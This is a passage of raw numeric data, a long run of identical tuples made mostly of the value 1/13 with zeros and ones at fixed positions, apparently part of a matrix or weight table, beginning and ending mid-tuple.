0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 